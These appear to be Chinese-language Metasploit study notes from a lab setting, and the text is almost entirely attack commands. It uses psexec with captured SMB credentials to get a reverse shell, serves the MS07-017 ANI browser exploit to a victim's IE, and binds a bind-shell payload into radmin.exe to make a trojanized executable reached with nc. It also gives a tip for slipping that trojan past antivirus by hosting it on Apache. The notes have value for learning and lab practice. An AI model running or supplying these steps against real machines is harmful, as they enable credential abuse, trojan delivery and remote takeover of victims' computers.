Exploit模块
RHOST远程主机,LHOST本地主机
1.active,受害者的服务存在漏洞,攻击者主动向受害者发送漏洞利用代码。
实例:exploit/windows/smb/psexec
适用场景:攻击者获取到了受害者的账号和密码,但是受害者机器上没有开放Telnet,远程桌面等服务。
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set rhost 192.168.80.150
msf exploit(psexec) > set smbuser coler
msf exploit(psexec) > set smbpass 123456
msf exploit(psexec) > set payload windows/shell/reverse_tcp
msf exploit(psexec) > set lhost 192.168.80.163
msf exploit(psexec) > exploit -j
msf exploit(handler) > sessions -u 1 将shell提升到meterpreter类型的shell
2.passive,受害者的客户端程序存在漏洞,攻击者诱使受害者使用存在漏洞的客户端程序,访问自己构建好的 存在漏洞利用代码的服务端程序。
实例:exploit/windows/browser/ms07_017_ani_loadimage_chunksize
msf > use exploit/windows/browser/ms07_017_ani_loadimage_chunksize
msf exploit(ms07_017_ani_loadimage_chunksize) > set srvhost 192.168.80.163
msf exploit(ms07_017_ani_loadimage_chunksize) > set payload windows/shell/reverse_tcp
msf exploit(ms07_017_ani_loadimage_chunksize) > set lhost 192.168.80.163
msf exploit(ms07_017_ani_loadimage_chunksize) > exploit
在存在漏洞的IE浏览器上访问http://192.168.80.163/,攻击者会得到受害者的shell。
Payload模块
msf > use payload/windows/shell_bind_tcp
msf payload(shell_bind_tcp) > generate -b '\x00' 过滤坏字符(实际是使用encoders模块将坏字符编码)
msf payload(shell_bind_tcp) > generate -b '\x00\xff' -t exe -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f 123.exe 将payload绑定到radmin.exe中
在靶机上运行123.exe,然后在攻击机上连接靶机的4444端口,会获得靶机的shell。
root@kali:/usr/share/windows-binaries# nc 192.168.80.11 4444
补充:有时将绑定payload的执行程序拷贝到物理机上,会被物理机的杀毒软件杀掉,可以先开启msf的Apache服务,将exe程序放在/var/www/html目录下,然后通过虚拟机直接访问下载。
root@kali:~# service apache2 start
root@kali:~# cp 123.exe /var/www/html/